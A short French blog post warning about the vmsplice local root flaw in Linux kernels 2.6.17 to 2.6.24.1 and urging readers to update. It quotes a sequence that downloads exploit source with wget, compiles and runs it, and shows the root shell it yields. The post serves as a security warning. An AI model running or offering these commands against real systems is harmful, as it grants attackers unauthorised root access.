Prévenu par Koreus et vu plus en détails sur l’excellent site Tux-planet, une horrible faille dans les kernels 2.6.17 à 2.6.24.1.
L’exploit dont parle Tux-Planet permet donc d’obtenir un accès root sur n’importe quelle machine à partir d’un compte user standard…
Ca craint un peu beaucoup. Pensez donc à mettre à jour votre Kernel. (opération délicate quand même !)
Voici un extrait de l’article de Tux Planet que je vous invite à consulter ici.
cd /tmp
wget http://public.tux-planet.fr/c/vmsplice-local-root-exploit.c
gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
./vmsplice-local-root-exploit
…
[root@localhost tmp]# id
uid=0(root) gid=0(root) groups=505(sbilbeau)
Merci encore à Koreus et à Pti-Seb